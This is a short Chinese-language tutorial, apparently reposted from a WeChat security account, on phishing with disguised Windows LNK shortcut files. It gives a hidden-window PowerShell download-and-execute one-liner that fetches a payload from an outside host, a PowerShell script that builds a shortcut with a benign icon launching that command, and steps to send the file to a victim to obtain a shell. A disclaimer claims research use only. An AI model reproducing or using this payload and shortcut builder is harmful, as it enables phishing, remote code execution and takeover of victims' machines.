文章前言
LNK文件是一种用于指向其他文件的特殊文件,这些文件通常也被称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用, LNK钓鱼主要将图标伪装成正常图标,但是目标会执行Shell命令
钓鱼实践
Step 1:点击Attacks—>Web Drive by—>Scripted Web Delivery,在弹出的对话框中将type类型设置为Powershell,然后单击launch生成代码
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.174.129:80/a'))"
Step 2:制作一下txt文本
Step 3:制作一下powershell
$file = Get-Content "Al1ex.txt"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("Al1ex.lnk")
$Shortcut.TargetPath = "%SystemRoot%system32cmd.exe"
$Shortcut.IconLocation = "%SystemRoot%System32Shell32.dll,21"
$Shortcut.Arguments = ' '+ $file
$Shortcut.Save()
Step 4:运行Al1ex.ps1,之后生成LNK文件
Step 5:后将Al1ex.lnk发送给受害者,诱导用户运行
Step 6:之后成功获得Shell
文末小结
基于LNK文件的钓鱼方式总体而言利用难度相对有点大,一般都需要通过钓鱼邮件的方式(例如:投递压缩包并附加Link文件)进行利用,不过作为一种后渗透阶段权限维持的方式也还是挺不错的,但是就得看点击率了~
原文始发于微信公众号(七芒星实验室):社工钓鱼之LNK钓鱼
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论